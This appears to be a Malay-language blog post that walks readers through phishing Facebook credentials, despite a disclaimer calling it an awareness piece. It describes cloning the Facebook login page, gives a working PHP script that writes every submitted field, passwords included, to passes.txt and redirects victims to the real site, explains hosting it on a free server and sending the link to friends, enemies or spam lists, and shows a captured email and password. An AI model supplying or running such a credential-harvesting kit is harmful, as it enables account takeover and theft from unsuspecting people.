Nota : Tulisan ini tidak bermaksud mengajar pembaca melakukan sesuatu yang salah tetapi ingin mengingatkan bahawa cara yang sama TELAH digunakan oleh hacker diluar sana untuk mendapatkan password pemilik akaun bank dan mencuri duit dari akaun orang lain. Dengan dokumentasi ini saya harap agar muncul kesedaran dikalangan pengguna komputer supaya dapat lebih berhati-hati ketika melayari internet terutamanya ketika memasukkan kata laluan yang melibatkan perbankan!
Caranya dipanggil Phishing.
Teori : Mencipta satu halaman seumpama halaman login facebook kemudian menghantar URL halaman tersebut kepada rakan, admirer, musuh ketat, penjenayah (atau juga kepada umum menggunakan email = spam) dengan harapan mereka akan masuk ke halaman tersebut dan memasukkan login ID beserta kata laluan. Kemudian, skrip akan menangkap maklumat yang dimasukkan lalu disimpan untuk paparan hacker dalam kes ini hacker ialah kita =)
Langkah 1.
Kita akan bina satu halaman facebook sama seperti yang boleh anda lihat disini. Kemudian, dalam kod halaman tersebut dilinkkan ke write.php yang akan kita bina dalam langkah 2. Anda boleh muatturun index.html (halaman login facebook yang telah siap di linkkanke write.php) menggunakan link berikut;
Langkah 2.
Bina satu skrip php untuk menangkap maklumat dan password yang dimasukkan dalam index.html diatas.
header("Location: http://www.facebook.com/");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Copy paste ke dalam gedit dan save sebagai write.php atau muatturun fail berikut;
Jadi sekarang anda mempunyai cukup bahan.
Langkah 3.
Muatnaik fail index.html dan write.php ke server anda. Tidak mempunyai server? Sila gunakan server percuma seperti http://www.justfree.com dan sebagainya. Dalam kes ini saya menggunakan justfree.com.
Selepas register, pergi ke file manager dan muatnaik (upload) 2 fail tadi.
Sekiranya nickname anda ialah melayubuntu, link pishing anda mungkin seperti berikut
Hantarkan link ini kepada target dan sekiranya mereka memasukkan kata laluan dalam halaman ini, fail passes.txt akan terbina secara automatik. Nak lihat kandungan passes.txt yang saya buat? Seperti dibawah
charset_test=€,´,€,´,水,Д,Є
version=1.0
return_session=0
session_key_only=0
lsd=QNZc2
email=melayubuntu@gmail.com
pass=tenasterisk
Jadi sekarang saya dapat tahu bahawa akaun yang menggunakan email melayubuntu@gmail.com menggunakan kata laluan tenasterisk.
Mudah atau susah?
Saya ingin ulang disini, cara yang sama seperti diatas digunakan oleh hacker untuk melakukan kerja keji iaitu mencuri duit dari akaun bank mangsa dan sekiranya anda menerima apa-apa email daripada bank mengatakan akaun bank anda mempunyai masalah, JANGAN klik apa-apa link pada email itu atau anda adalah mangsa yang seterusnya.
Semoga ada kebaikan dari entry saya pada kali ini. Sekian.
